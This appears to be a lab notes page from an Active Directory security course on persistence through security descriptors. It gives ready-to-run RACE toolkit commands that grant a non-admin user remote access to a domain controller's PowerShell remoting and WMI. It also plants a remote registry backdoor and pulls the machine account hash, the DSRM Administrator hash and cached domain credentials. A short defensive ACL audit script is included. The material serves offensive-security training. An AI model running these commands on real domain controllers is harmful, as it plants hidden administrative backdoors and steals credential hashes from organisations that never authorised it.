# Security Descriptors

* The security descriptor (owner, primary group, DACL, SACL) of several remote access methods (securable objects) can be modified to allow access to non-admin users.
* Admin privileges are required to modify a security descriptor.
* ACLs can be modified to allow non-admin users to access securable objects.

**PowerShell Remoting:**

Use the RACE toolkit, via either PSRemoting or WMI.

* Using PSRemoting

{% code overflow="wrap" %}

```powershell
# Using PSRemoting
# Run InviShell
# First, dot-source RACE.ps1 to import the RACE toolkit:
. C:\AD\Tools\RACE-master\RACE.ps1

# On the local machine, from an elevated prompt, for student1:
# This reads the existing security descriptor of the PowerShell remoting endpoint and adds an entry for our SID.
Set-RemotePSRemoting -SamAccountName student1 -Verbose

# On remote machine for student1 without credentials:
Set-RemotePSRemoting -SamAccountName student1 -ComputerName dcorp-dc -Verbose
# Connect to dcorp-dc as student1
Enter-PSSession -ComputerName dcorp-dc

# To remove the permissions on remote machine:
Set-RemotePSRemoting -SamAccountName student1 -ComputerName dcorp-dc -Remove
```

{% endcode %}

* Using WMI

{% code overflow="wrap" %}

```powershell
# OR Using WMI 
Set-RemoteWMI -SamAccountName student1 -Verbose

# On remote machine for student1 without credentials:
Set-RemoteWMI -SamAccountName student1 -ComputerName dcorp-dc -namespace 'root\cimv2' -Verbose

# On remote machine with explicit credentials. Only root\cimv2 and nested namespaces:
Set-RemoteWMI -SamAccountName student1 -ComputerName dcorp-dc -Credential Administrator -namespace 'root\cimv2' -Verbose
# On remote machine remove permissions:
Set-RemoteWMI -SamAccountName student1 -ComputerName dcorp-dc -namespace 'root\cimv2' -Remove -Verbose

# Now we can run WMI queries on the DC as student1.
powershell
gwmi -class win32_operatingsystem -ComputerName dcorp-dc
```

{% endcode %}
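To check an endpoint for the kind of change `Set-RemotePSRemoting` makes, compare each session configuration's DACL against a baseline. This is an added audit example, not part of RACE or the original page; the function names, the baseline SID list and the sample SDDL (with a made-up domain SID) are assumptions constructed for illustration.

```powershell
# Added audit example (not RACE code): list allow ACEs outside an expected baseline.
function Get-UnexpectedAce {
    param(
        [Parameter(Mandatory)][string]$Sddl,
        # Assumed baseline: Administrators, INTERACTIVE, Remote Management Users
        [string[]]$BaselineSid = @('S-1-5-32-544', 'S-1-5-4', 'S-1-5-32-580')
    )
    $sd = New-Object System.Security.AccessControl.RawSecurityDescriptor -ArgumentList $Sddl
    foreach ($ace in $sd.DiscretionaryAcl) {
        # Only simple allow ACEs are considered; deny, audit and object ACEs are skipped
        if ($ace -isnot [System.Security.AccessControl.CommonAce]) { continue }
        if ($ace.AceQualifier -ne 'AccessAllowed') { continue }
        $sid = $ace.SecurityIdentifier.Value
        if ($BaselineSid -notcontains $sid) {
            [pscustomobject]@{
                Sid         = $sid
                AccessMask  = '0x{0:X8}' -f $ace.AccessMask
                IsDomainSid = $sid -like 'S-1-5-21-*'
            }
        }
    }
}

# Live check (elevated prompt, WinRM running): audit every session configuration.
function Get-PSRemotingAclFinding {
    Get-PSSessionConfiguration | Where-Object SecurityDescriptorSddl | ForEach-Object {
        $name = $_.Name
        Get-UnexpectedAce -Sddl $_.SecurityDescriptorSddl |
            Add-Member -NotePropertyName Endpoint -NotePropertyValue $name -PassThru
    }
}

# Constructed sample: default-style DACL plus one extra ACE for a made-up domain user SID.
$sample = 'O:NSG:BAD:P(A;;GA;;;BA)(A;;GA;;;IU)(A;;GA;;;S-1-5-32-580)' +
          '(A;;GA;;;S-1-5-21-1111111111-2222222222-3333333333-1104)'
Get-UnexpectedAce -Sddl $sample | Format-Table -AutoSize
```

Run `Get-PSRemotingAclFinding` on the host itself and adjust `-BaselineSid` to whatever groups your environment intentionally grants remoting access.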

**Remote Registry:**

* Using `RACE` or DAMP, with admin privileges on the remote machine (run this first):

```powershell
Add-RemoteRegBackdoor -ComputerName dcorp-dc -Trustee student1 -Verbose
```

* As student1, retrieve machine account hash:

```powershell
Get-RemoteMachineAccountHash -ComputerName dcorp-dc -Verbose
```

* Retrieve local account hash (DSRM Administrator):

```powershell
Get-RemoteLocalAccountHash -ComputerName dcorp-dc -Verbose
```

* Retrieve domain cached credentials:

```powershell
Get-RemoteCachedCredential -ComputerName dcorp-dc -Verbose
```
